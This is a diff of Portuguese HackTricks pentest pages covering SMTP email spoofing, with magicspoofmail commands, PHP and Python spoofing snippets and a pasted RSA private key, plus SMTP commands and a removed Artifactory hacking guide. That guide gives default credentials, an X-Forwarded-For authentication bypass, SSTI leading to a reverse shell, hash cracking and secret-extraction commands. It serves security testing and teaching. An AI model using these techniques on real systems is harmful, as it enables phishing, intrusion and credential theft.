* [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index)
* [**http://www.anonymailer.net/**](http://www.anonymailer.net)
@ -401,8 +406,8 @@ python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
```
{% hint style="warning" %}
Se você encontrar algum **erro ao usar a biblioteca python dkim** ao analisar a chave, fique à vontade para usar a seguinte.\
**NOTA**: Isso é apenas uma solução rápida para fazer verificações rápidas em casos onde, por algum motivo, a chave privada openssl **não pode ser analisada pelo dkim**.
Se você receber algum **erro ao usar a biblioteca dkim python** para analisar a chave, sinta-se à vontade para usar a seguinte.\
**NOTA**: Esta é apenas uma correção rápida para fazer verificações rápidas em casos em que, por algum motivo, a chave privada do openssl **não pode ser analisada pelo dkim**.
```
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
@ -422,12 +427,12 @@ K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
```
{% endhint %}
**Ou você pode fazer isso manualmente:**
**Ou você pode fazer manualmente:**
{% tabs %}
{% tab title="PHP" %}
<pre class="language-php"><code class="lang-php"><strong># Isso enviará uma mensagem não assinada
</strong><strong>mail("seu_email@gmail.com", "Assunto de Teste!", "Ei! Isso é um teste", "De: administrator@victim.com");
</strong><strong>mail("seu_email@gmail.com", "Assunto de Teste!", "oi! Este é um teste", "De: administrador@vitima.com");
</strong></code></pre>
{% endtab %}
@ -487,9 +492,6 @@ smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)
```
{% endtab %}
{% endtabs %}
### **Mais informações**
**Encontre mais informações sobre essas proteções em** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/)
@ -499,15 +501,15 @@ s.sendmail(sender, [destination], msg_data)
* Idade do domínio
* Links apontando para endereços IP
* Técnicas de manipulação de links
* Anexos suspeitos (incomuns)
* Conteúdo de e-mail quebrado
* Valores utilizados que são diferentes dos cabeçalhos de e-mail
* Anexos suspeitos (não comuns)
* Conteúdo de e-mail corrompido
* Valores utilizados diferentes dos cabeçalhos de e-mail
* Existência de um certificado SSL válido e confiável
* Submissão da página a sites de filtragem de conteúdo web
* Submissão da página a sites de filtragem de conteúdo da web
## Exfiltração através do SMTP
**Se você pode enviar dados via SMTP** [**leia isto**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.**
**Se você pode enviar dados via SMTP** [**leia isso**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.**
## Arquivo de configuração
@ -520,7 +522,9 @@ Outros arquivos de configuração:
sendmail.cf
submit.cf
```
## Comandos Automáticos HackTricks
## Referências
* [https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/](https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/)
* [https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/](https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/)
```
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
@ -573,19 +577,19 @@ Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {
```
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
**Configuração imediatamente disponível para avaliação de vulnerabilidade e pentesting**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde reconhecimento até relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para lhes dar mais tempo para investigar mais a fundo, obter acessos e se divertir.
**Configuração instantaneamente disponível para avaliação de vulnerabilidades e teste de penetração**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde a reconstrução até a geração de relatórios. Não substituímos os pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para aprofundar, abrir shells e se divertir.
{% embed url="https://pentest-tools.com/" %}
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo do** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo do [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

60
network-services-pentesting/pentesting-smtp/smtp-commands.md
View file

@ -2,81 +2,81 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks Especialista em Equipe Vermelha AWS)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
**Configuração imediatamente disponível para avaliação de vulnerabilidade e pentesting**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde reconhecimento até relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para lhes dar mais tempo para investigar mais a fundo, explorar vulnerabilidades e se divertir.
**Configuração instantaneamente disponível para avaliação de vulnerabilidades e teste de penetração**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde a reconstrução até a geração de relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para aprofundar, abrir shells e se divertir.
{% embed url="https://pentest-tools.com/" %}
**Extraído de:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
**Comandos de:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
**HELO**\
É o primeiro comando SMTP: inicia a conversa identificando o servidor remetente e geralmente é seguido pelo nome de domínio do mesmo.
É o primeiro comando SMTP: inicia a conversa identificando o servidor remetente e geralmente é seguido pelo nome de seu domínio.
**EHLO**\
Um comando alternativo para iniciar a conversa, indicando que o servidor está utilizando o protocolo SMTP Estendido.
Um comando alternativo para iniciar a conversa, destacando que o servidor está usando o protocolo SMTP estendido.
**MAIL FROM**\
Com este comando SMTP as operações começam: o remetente indica o endereço de e-mail de origem no campo "From" e inicia de fato a transferência do e-mail.
Com este comando SMTP as operações começam: o remetente declara o endereço de e-mail de origem no campo "De" e realmente inicia a transferência de e-mail.
**RCPT TO**\
Identifica o destinatário do e-mail; se houver mais de um, o comando é simplesmente repetido para cada endereço.
Identifica o destinatário do e-mail; se houver mais de um, o comando é simplesmente repetido endereço por endereço.
**SIZE**\
Este comando SMTP informa ao servidor remoto sobre o tamanho estimado (em bytes) do e-mail anexado. Também pode ser usado para relatar o tamanho máximo de uma mensagem a ser aceita pelo servidor.
Este comando SMTP informa ao servidor remoto o tamanho estimado (em bytes) do e-mail anexado. Também pode ser usado para relatar o tamanho máximo de uma mensagem a ser aceita pelo servidor.
**DATA**\
Com o comando DATA, começa a transferência do conteúdo do e-mail; geralmente é seguido por um código de resposta 354 dado pelo servidor, dando permissão para iniciar a transmissão efetiva.
Com o comando DATA, o conteúdo do e-mail começa a ser transferido; geralmente é seguido por um código de resposta 354 fornecido pelo servidor, dando permissão para iniciar a transmissão real.
**VRFY**\
O servidor é solicitado a verificar se um endereço de e-mail ou nome de usuário específico realmente existe.
O servidor é solicitado a verificar se um determinado endereço de e-mail ou nome de usuário realmente existe.
**TURN**\
Este comando é usado para inverter os papéis entre o cliente e o servidor, sem a necessidade de iniciar uma nova conexão.
Este comando é usado para inverter os papéis entre o cliente e o servidor, sem a necessidade de executar uma nova conexão.
**AUTH**\
Com o comando AUTH, o cliente se autentica ao servidor, fornecendo seu nome de usuário e senha. É mais uma camada de segurança para garantir uma transmissão adequada.
Com o comando AUTH, o cliente se autentica no servidor, fornecendo seu nome de usuário e senha. É mais uma camada de segurança para garantir uma transmissão adequada.
**RSET**\
Comunica ao servidor que a transmissão de e-mail em andamento será terminada, embora a conversa SMTP não seja encerrada (como no caso do QUIT).
Comunica ao servidor que a transmissão de e-mail em andamento será encerrada, embora a conversa SMTP não será fechada (como no caso de QUIT).
**EXPN**\
Este comando SMTP solicita uma confirmação sobre a identificação de uma lista de distribuição.
Este comando SMTP solicita uma confirmação sobre a identificação de uma lista de discussão.
**HELP**\
É um pedido do cliente por algumas informações que podem ser úteis para a transferência bem-sucedida do e-mail.
É uma solicitação do cliente por algumas informações que podem ser úteis para uma transferência bem-sucedida do e-mail.
**QUIT**\
Termina a conversa SMTP.
Encerra a conversa SMTP.
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
**Configuração imediatamente disponível para avaliação de vulnerabilidade e pentesting**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde reconhecimento até relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para lhes dar mais tempo para investigar mais a fundo, explorar vulnerabilidades e se divertir.
**Configuração instantaneamente disponível para avaliação de vulnerabilidades e teste de penetração**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde a reconstrução até a geração de relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para aprofundar, abrir shells e se divertir.
{% embed url="https://pentest-tools.com/" %}
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks Especialista em Equipe Vermelha AWS)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

225
network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
View file

@ -1,224 +1,29 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
**Este conteúdo foi retirado de** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory)
# Fundamentos do Artifactory <a href="#artifactory-basics" id="artifactory-basics"></a>
## Usuários e senhas padrão <a href="#default-users-and-passwords" id="default-users-and-passwords"></a>
As contas padrão do Artifactory são:
| Conta | Senha padrão | Notas |
| ------------ | ---------------------------------------------- | -------------------------------------------------------------------- |
| admin | password | conta comum de administração |
| access-admin | password (<6.8.0) ou um valor aleatório (>= 6.8.0) | usada apenas para operações de administração local |
| anonymous | | usuário anônimo para recuperar pacotes remotamente, não ativado por padrão |
Por padrão, não há uma política de bloqueio de senha, o que torna o Artifactory um alvo principal para ataques de preenchimento de credenciais e pulverização de senhas.
## Autorizações <a href="#authorizations" id="authorizations"></a>
Idealmente, é isso que você deve ver ao se conectar ao Artifactory:
![Página de login](https://www.errno.fr/artifactory/artif\_login.png)
Por outro lado, se você for recebido com algo mais parecido com isto:
![Página padrão](https://www.errno.fr/artifactory/artif\_default.png)
Isso significa que o "Acesso Anônimo" foi habilitado no painel de administração, o que é uma configuração comum usada para permitir que aplicações recuperem artefatos sem problemas, mas permite que você, o atacante, veja mais do que é preferível.
## Verificando direitos de conta <a href="#checking-account-rights" id="checking-account-rights"></a>
Às vezes, devido a uma má configuração, o usuário anônimo tem permissão para implantar arquivos em alguns repositórios!
Para verificar em quais repositórios o usuário anônimo pode implantar, use a seguinte solicitação:
```
curl http://localhost:8081/artifactory/ui/repodata?deploy=true
{"repoList":["artifactory-build-info","example-repo-local"]}
```
Se houver entradas `repoKey` na solicitação, o usuário anônimo pode implantar nelas, o que é realmente muito ruim. Você definitivamente deve estar autenticado para implantar quaisquer arquivos.
Isso pode ser generalizado para outras contas assim que você obter uma senha ou token para elas.
## Listando usuários <a href="#listing-users" id="listing-users"></a>
Por algum motivo, listar usuários é um direito reservado apenas para administradores. Encontrei uma maneira alternativa de listar usuários (aqueles que estão ativamente implantando pelo menos) que depende do valor “Implantado Por” dos artefatos:
![Implantado Por](https://www.errno.fr/artifactory/artif\_deployed\_by.png)
[Este script](https://gist.github.com/gquere/347e8e042490be87e6e9e32e428cb47a) simplesmente tenta encontrar recursivamente todos os usuários que implantaram artefatos. Note que pode levar um tempo para ser concluído se houver muitos repositórios (>1000).
```
./artifactory_list_users.py http://127.0.0.1:8081/artifactory
There are 23 repositories to process
Found user admin
Found user test
Found user user
Found user test_deploy
```
## Permissões <a href="#permissions" id="permissions"></a>
Aqui estão as permissões básicas e suas utilidades:
* Gerenciar: ?
* Excluir/Sobrescrever: interessante para pentest
* Implementar/Cache: interessante para pentest
* Anotar: necessário para CVE-2020-7931
* Ler: geralmente uma permissão padrão
# Vulnerabilidades conhecidas <a href="#known-vulnerabilities" id="known-vulnerabilities"></a>
Aqui está uma lista selecionada de vulnerabilidades públicas de alto impacto:
## CVE-2016-10036: Upload de Arquivo Arbitrário & RCE (<4.8.6) <a href="#cve-2016-10036-arbitrary-file-upload--rce-486" id="cve-2016-10036-arbitrary-file-upload--rce-486"></a>
[Detalhes aqui.](https://www.exploit-db.com/exploits/44543)
Esta está ficando um pouco antiga e é improvável que você encontre uma versão tão desatualizada do Artifactory. No entanto, é bastante eficaz, pois é uma simples travessia de diretório que permite a execução arbitrária de código no nível do Tomcat.
## CVE-2019-9733: Bypass de Autenticação (<6.8.6) <a href="#cve-2019-9733-authentication-bypass-686" id="cve-2019-9733-authentication-bypass-686"></a>
[Aviso original aqui.](https://www.ciphertechs.com/jfrog-artifactory-advisory/)
Em versões mais antigas do Artifactory (até 6.7.3), a conta `access-admin` usava uma senha padrão `password`.
Esta conta local normalmente é proibida de acessar a UI ou API, mas até a versão 6.8.6 o Artifactory poderia ser enganado para acreditar que a solicitação emanava localmente se o cabeçalho HTTP `X-Forwarded-For` fosse definido como `127.0.0.1`.
## CVE-2020-7931: Injeção de Template no Lado do Servidor (Artifactory Pro) <a href="#cve-2020-7931-server-side-template-injection-artifactory-pro" id="cve-2020-7931-server-side-template-injection-artifactory-pro"></a>
[Aviso original aqui.](https://github.com/atredispartners/advisories/blob/master/ATREDIS-2019-0006.md)
Aqui está uma [ferramenta que escrevi](https://github.com/gquere/CVE-2020-7931) para automatizar a exploração desta vulnerabilidade.
Estes são necessários para a exploração:
* um usuário com direitos de implementar (criar arquivos) e anotar (definir filtrados)
* Artifactory Pro
A vulnerabilidade é bastante simples: se um recurso implementado for definido como filtrado, ele é interpretado como um Template Freemarker, o que dá ao atacante uma janela de ataque SSTI. ![Recurso Filtrado](https://www.errno.fr/artifactory/artif\_filtered.png)
Aqui estão as primitivas implementadas:
* leituras básicas do sistema de arquivos
* escritas limitadas no sistema de arquivos
Estas devem ser suficientes para lhe dar execução de código remoto de várias maneiras, da mais fácil/discreta à mais difícil/barulhenta:
* lendo um segredo no sistema de arquivos que permite pivotar (/home/user/.bash\_history, /home/user/password.txt, /home/user/.ssh/id\_rsa …)
* adicionando uma chave SSH ao usuário
* implementando um .war para executar um servlet
* implementando um script de usuário Groovy do Artifactory
### Histórias de .war: Travessuras do Java renameTo() <a href="#war-stories-java-renameto-shenanigans" id="war-stories-java-renameto-shenanigans"></a>
Esta é uma pequena história de como bati a cabeça contra a parede por horas, se não dias, durante um pentest. Eu me deparei com um Artifactory desatualizado que eu sabia que era vulnerável ao CVE-2020-7931. Implementei o template SSTI do aviso original e comecei a percorrer o sistema de arquivos. Parecia que o Artifactory havia sido instalado em um local não padrão, o que não é tão incomum, pois os administradores gostam de manter partições separadas entre binários de aplicativos, dados, logs e configuração (isso é bom!). Não havia chaves SSH ou senhas no diretório home do usuário que me proporcionassem um pivot fácil, então chegou a hora de ser menos discreto e escrever no sistema de arquivos. Colocar o payload inicial (uma chave pública) no diretório de upload do Artifactory foi tranquilo, mas eu simplesmente não conseguia movê-lo para o diretório de chaves SSH. Então voltei para minha sandbox de exploração, testei novamente e veja só, funcionou bem. Então tinha que haver uma configuração diferente que me impedia de completar o método `renameTo()`. Neste ponto, é sempre uma boa ideia [verificar a documentação](https://docs.oracle.com/javase/8/docs/api/java/io/File.html#renameTo-java.io.File-) ... que claramente afirma que você não pode renomear arquivos entre diferentes sistemas de arquivos, o que eu acho que faz sentido dependendo da implementação do método, ou seja, se ele funciona a nível de inode. Arg.
Lembra do que eu disse sobre os administradores gostarem de partições? Bem, este é um caso de um administrador que, sem saber, reforçou sua configuração contra meu exploit! Então eu tive que cavar o que é essencialmente uma prisão Java para encontrar outro método que me permitisse escrever um arquivo no disco. E isso não foi nada divertido, pois eu não estou familiarizado com nada do que estava envolvido: Templates FTL, Java, Tomcat/Catalina. Rapidamente descobri que as fugas comuns de prisões Java simplesmente não funcionariam, pois instanciar novas classes era proibido. Após horas lendo a documentação das classes Java e Catalina, finalmente encontrei um método write() em um objeto ao qual eu poderia chegar. Mas ele era limitado ao caminho base da aplicação web... Então pensei em combinar a escrita em outro sistema de arquivos e o `renameTo()` através deste novo sistema de arquivos acessível para, esperançosamente, poder escrever em qualquer lugar? E meio que funcionou. Eu consegui escrever fora do diretório temporário de upload ... mas não tão longe dele, pois agora eu estava preso em outro sistema de arquivos que era o ponto de montagem para todas as coisas do artifactory: configuração, aplicativo e coisas. Então ainda não tinha chave SSH para mim.
Ok, eu poderia escrever na pasta raiz do artifactory, certamente eu poderia fazer algo aqui? Ei, o Tomcat padrão automaticamente implementa arquivos WAR escritos em seu caminho de aplicação, não é? Então usei o msfvenom para gerar um webshell JSP embalado em um arquivo WAR e testei na minha sandbox... bem, ele foi implementado, mas não me deu execução de comando. Parece que o Tomcat padrão não lida com JSPs. Ugh. Ficando cada vez mais frustrado, procurei outra maneira de executar código no Tomcat e encontrei outro método de execução usando servlets. Não consegui encontrar um payload apropriado então dane-se, estou all in neste ponto e [criei o meu próprio que você pode encontrar aqui](https://github.com/gquere/javaWebShell). Testei na sandbox, funciona, ok. Coloquei no alvo, implementa e ... nada. Acontece que havia um proxy na frente do artifactory que reescrevia todas as URLs para /artifactory. Então, mesmo que minha porta dos fundos estivesse implementada e funcionando, não havia como eu acessá-la... Se houvesse alguma execução de código remoto a ser alcançada neste ponto, teria que ser no contexto do Artifactory, não do Tomcat.
Na manhã seguinte, estou soluçando na minha mesa olhando pela última vez a documentação do Artifactory na vã esperança de uma epifania. E então as palavras mágicas "scripts Groovy" apareceram. Acontece que há uma maneira complicada de executar scripts Groovy, escrevendo-os no disco e recarregando-os através da API. Salvo no último! Então eu coloquei um reverseshell Groovy na máquina e foi o fim daquilo. Ainda desejo ter encontrado um método mais limpo que teria escrito em qualquer lugar no sistema de arquivos usando o SSTI, mas com certeza não ia voltar a desenvolver!
Felizmente, nem todos os pentests são assim :)
# Pós-Exploração <a href="#post-exploitation" id="post-exploitation"></a>
O seguinte só é útil uma vez que você tenha alcançado execução de código remoto ou leitura arbitrária de arquivo no servidor e pode ajudá-lo a pivotar para outra máquina.
## Armazenamento de senhas e segredos externos <a href="#storage-of-passwords-and-external-secrets" id="storage-of-passwords-and-external-secrets"></a>
### Senhas locais <a href="#local-passwords" id="local-passwords"></a>
Senhas locais do artifactory são armazenadas em forma de MD5 salgado ou bcrypt, sendo o primeiro depreciado.
Senhas MD5 são sempre salgadas com o valor spring codificado `{CAFEBABEEBABEFAC}`, e usam simples concatenação sem rodadas, ou seja, `hash = md5(senha + sal)`. O banco de dados diz que o sal é `CAFEBABEEBABEFAC` mas acredite em mim, é `{CAFEBABEEBABEFAC}`, eu tive dificuldade para encontrá-lo :)
Quebrar essas senhas MD5 requer o uso de um modo dinâmico para JtR:
```
cat artifactory.hashes
user:1f70548d73baca61aab8660733c7de81${CAFEBABEEBABEFAC}
john artifactory.hashes --format=dynamic_1
Loaded 1 password hash (dynamic_1 [md5($p.$s) (joomla) 256/256 AVX2 8x3])
password (user)
```
O outro tipo de senha bcrypt não requer nada especial, é apenas um hash bcrypt padrão:
```
cat artifactory_bcrypt.hashes
admin:$2a$08$EbfHSAjPLoJnG/yHS/zmi.VizaWSipUuKAo7laKt6b8LePPTfDVeW
john artifactory_bcrypt.hashes
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
password (admin)
```
### Segredos remotos <a href="#remote-secrets" id="remote-secrets"></a>
O Artifactory pode precisar armazenar segredos para se identificar a serviços remotos. Esses segredos não são hasheados, claro, eles são armazenados criptografados no disco, com a chave ao lado deles. Existem dois tipos de segredos mencionados na [documentação oficial](https://jfrog.com/knowledge-base/what-are-the-artifactory-key-master-key-and-what-are-they-used-for/).
**Formato antigo (<5.9): DES-EDE**
TODO. [Abra uma issue se você tiver dados criptografados de exemplo](https://github.com/gquere/ArtifactoryDecryptor).
**Novo formato (>=5.9): Criptografia AES128-CBC, armazenada como base58**
Segredos externos (como senhas de servidores remotos) são encontrados nos [descritores de configuração](https://www.jfrog.com/confluence/display/JFROG/Configuration+Files#ConfigurationFiles-GlobalConfigurationDescriptor), por exemplo, `/var/opt/jfrog/artifactory/etc/artifactory.config.latest.xml` e parecem com:
```
<keyStorePassword>AM.25rLQ.AES128.vJMeKkaK6RBRQCUKJWvYEHUw6zs394X1CrRugvJsQGPanhMgQ5be8yjWDhJYC4BEz2KRE</keyStorePassword>
```
Onde:
* `AM` sempre denota um segredo criptografado do artifactory
* `25rLQ` é o identificador do segredo que deve corresponder ao identificador da chave
* `AES128` obviamente é o algoritmo utilizado
* `vJMeK...KRE` é a codificação base58 de `IV_SIZE|IV|segredo|CRC`
Mais segredos podem ser encontrados (tokens, backups de configuração ...) usando a seguinte expressão regular:
```
grep -r 'AM\..*\.AES128\.' /var/opt/jfrog/artifactory/
```
A chave está armazenada em `/var/opt/jfrog/artifactory/etc/security/artifactory.key` e parece com:
```
JS.25rLQ.AES128.7fcJFd3Y2ib3wi4EHnhbvZuxu
```
Onde:
* `JS` denota uma chave
* `25rLQ` é um identificador de chave único que mantém o controle de qual chave pode descriptografar quais segredos
* `AES128` obviamente é o algoritmo usado
* `7fcJFd3Y2ib3wi4EHnhbvZuxu` é a codificação base58 da chave e 2 bytes de CRC
Esta ferramenta que escrevi pode ser usada offline para descriptografar segredos do Artifactory: [ArtifactoryDecryptor](https://github.com/gquere/ArtifactoryDecryptor).
# Defendendo o Artifactory <a href="#defending-artifactory" id="defending-artifactory"></a>
